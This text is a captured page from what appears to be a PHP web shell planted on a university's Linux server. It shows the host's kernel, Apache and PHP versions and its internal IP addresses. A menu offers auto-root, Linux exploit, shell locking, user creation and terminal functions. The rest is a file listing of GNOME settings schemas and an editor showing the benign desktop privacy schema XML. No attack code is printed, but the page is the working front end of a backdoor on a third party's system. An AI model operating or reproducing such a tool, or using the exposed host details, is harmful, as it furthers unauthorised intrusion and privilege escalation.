Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
snap /
snap-store /
1216 /
usr /
share /
glib-2.0 /
schemas /
[ HOME SHELL ]
Name
Size
Permission
Action
10_gsettings-desktop-schemas.gschema.override
342
B
-rw-r--r--
10_ubuntu-settings.gschema.override
6.39
KB
-rw-r--r--
org.gnome.ControlCenter.gschema.xml
801
B
-rw-r--r--
org.gnome.desktop.a11y.applications.gschema.xml
845
B
-rw-r--r--
org.gnome.desktop.a11y.gschema.xml
828
B
-rw-r--r--
org.gnome.desktop.a11y.interface.gschema.xml
422
B
-rw-r--r--
org.gnome.desktop.a11y.keyboard.gschema.xml
4.78
KB
-rw-r--r--
org.gnome.desktop.a11y.magnifier.gschema.xml
9.16
KB
-rw-r--r--
org.gnome.desktop.a11y.mouse.gschema.xml
2.84
KB
-rw-r--r--
org.gnome.desktop.app-folders.gschema.xml
1.8
KB
-rw-r--r--
org.gnome.desktop.background.gschema.xml
2.55
KB
-rw-r--r--
org.gnome.desktop.calendar.gschema.xml
427
B
-rw-r--r--
org.gnome.desktop.datetime.gschema.xml
439
B
-rw-r--r--
org.gnome.desktop.default-applications.gschema.xml
3.02
KB
-rw-r--r--
org.gnome.desktop.enums.xml
6.41
KB
-rw-r--r--
org.gnome.desktop.input-sources.gschema.xml
2.49
KB
-rw-r--r--
org.gnome.desktop.interface.gschema.xml
12.18
KB
-rw-r--r--
org.gnome.desktop.lockdown.gschema.xml
3.37
KB
-rw-r--r--
org.gnome.desktop.media-handling.gschema.xml
2.54
KB
-rw-r--r--
org.gnome.desktop.notifications.gschema.xml
2.77
KB
-rw-r--r--
org.gnome.desktop.peripherals.gschema.xml
13.32
KB
-rw-r--r--
org.gnome.desktop.privacy.gschema.xml
4.79
KB
-rw-r--r--
org.gnome.desktop.screensaver.gschema.xml
6.05
KB
-rw-r--r--
org.gnome.desktop.search-providers.gschema.xml
1.86
KB
-rw-r--r--
org.gnome.desktop.session.gschema.xml
668
B
-rw-r--r--
org.gnome.desktop.sound.gschema.xml
1.03
KB
-rw-r--r--
org.gnome.desktop.thumbnail-cache.gschema.xml
600
B
-rw-r--r--
org.gnome.desktop.thumbnailers.gschema.xml
866
B
-rw-r--r--
org.gnome.desktop.wm.keybindings.gschema.xml
13.31
KB
-rw-r--r--
org.gnome.desktop.wm.preferences.gschema.xml
12.61
KB
-rw-r--r--
org.gnome.software.gschema.xml
7.58
KB
-rw-r--r--
org.gnome.system.locale.gschema.xml
448
B
-rw-r--r--
org.gnome.system.location.gschema.xml
1.13
KB
-rw-r--r--
org.gnome.system.proxy.gschema.xml
6.2
KB
-rw-r--r--
org.gtk.Settings.ColorChooser.gschema.xml
931
B
-rw-r--r--
org.gtk.Settings.Debug.gschema.xml
833
B
-rw-r--r--
org.gtk.Settings.EmojiChooser.gschema.xml
623
B
-rw-r--r--
org.gtk.Settings.FileChooser.gschema.xml
6.07
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : org.gnome.desktop.privacy.gschema.xml
<?xml version="1.0" encoding="UTF-8"?> <schemalist gettext-domain="gsettings-desktop-schemas"> <schema id="org.gnome.desktop.privacy" path="/org/gnome/desktop/privacy/"> <key name="hide-identity" type="b"> <default>false</default> <summary>Controls visibility of personal information</summary> <description>If set to true, the system will make an effort to not divulge the user’s identity on screen or on the network.</description> </key> <key name="show-full-name-in-top-bar" type="b"> <default>true</default> <summary>Show full name in the user menu</summary> <description>Whether the users full name is shown in the user menu or not.</description> </key> <key name="remove-old-trash-files" type="b"> <default>false</default> <summary>Whether to remove old files from the trash automatically</summary> <description>If TRUE, automatically remove files from the trash when they are older than “old-files-age” days.</description> </key> <key name="remove-old-temp-files" type="b"> <default>false</default> <summary>Whether to remove old temporary files automatically</summary> <description>If TRUE, automatically remove temporary files when they are older than “old-files-age” days.</description> </key> <key name="old-files-age" type="u"> <default>30</default> <summary>Number of days to keep trash and temporary files</summary> <description>Consider trash and temporary files old after this many days.</description> </key> <key name="remember-recent-files" type="b"> <default>true</default> <summary>Whether to remember recently used files</summary> <description>If FALSE, applications will not remember recently used files.</description> </key> <key name="recent-files-max-age" type="i"> <default>-1</default> <summary>Number of days to remember recently used files for</summary> <description>Recently used files will be remembered for this many days. If set to 0, recent files will not be remembered; if set to -1, they will be retained indefinitely.</description> </key> <key name="remember-app-usage" type="b"> <default>true</default> <summary>Whether to remember application usage</summary> <description>If FALSE, application usage will not be monitored and recorded.</description> </key> <key name="send-software-usage-stats" type="b"> <default>false</default> <summary>Send statistics when applications are removed or installed</summary> <description>If FALSE, no anonymous installation or removal information will be sent to the vendor.</description> </key> <key name="report-technical-problems" type="b"> <default>false</default> <summary>Send reports of technical problems to the vendor</summary> <description>If TRUE, anonymized reports will be sent automatically to the vendor.</description> </key> <key name="disable-microphone" type="b"> <default>false</default> <summary>Don’t allow applications to access the microphone</summary> <description>If TRUE, applications should not use the microphone.</description> </key> <key name="disable-camera" type="b"> <default>false</default> <summary>Don’t allow applications to access the camera</summary> <description>If TRUE, applications should not use the camera.</description> </key> <key name="disable-sound-output" type="b"> <default>false</default> <summary>Don’t allow applications to output sound</summary> <description>If TRUE, applications should not make sound.</description> </key> <key name="usb-protection" type="b"> <default>true</default> <summary>Whether to protect USB devices</summary> <description>If the USBGuard service is present and this setting is enabled, USB devices will be protected as configured in the usb-protection-level setting. </description> </key> <key name="usb-protection-level" enum="org.gnome.desktop.GDesktopUsbProtection"> <default>'lockscreen'</default> <summary>When USB devices should be rejected</summary> <description> If set to “lockscreen”, only when the lock screen is present new USB devices will be rejected; if set to “always”, all new USB devices will always be rejected. </description> </key> <key name="privacy-screen" type="b"> <default>false</default> <summary>Whether the privacy screen is enabled</summary> <description>If the underlying hardware has privacy screen support and this setting is enabled, the panels supporting this technology will be obscured from lateral view. </description> </key> </schema> </schemalist>
Close